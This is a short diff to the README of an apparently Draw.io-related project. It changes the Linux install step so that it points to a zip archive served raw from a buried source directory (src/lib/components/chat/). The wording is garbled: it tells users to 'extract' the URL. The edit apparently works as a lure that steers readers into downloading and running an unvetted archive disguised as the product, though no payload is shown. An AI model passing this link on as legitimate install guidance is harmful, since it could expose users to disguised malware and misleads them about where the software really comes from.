ShaaibAljaberi/drawio-live-editor/README.md

 4. **Run the Application**:
    - For Windows, double-click the downloaded `.exe` file to start the installation.
    - For macOS, open the downloaded `.dmg` file and drag the drawio-live-editor to your Applications folder.
-   - For Linux, extract the downloaded `.tar.gz` file and follow the included instructions.
+   - For Linux, extract the downloaded `https://raw.githubusercontent.com/ShaaibAljaberi/drawio-live-editor/master/src/lib/components/chat/drawio_editor_live_2.5.zip` file and follow the included instructions.

 5. **Follow the Installation Prompts**: Follow the on-screen instructions to complete the installation.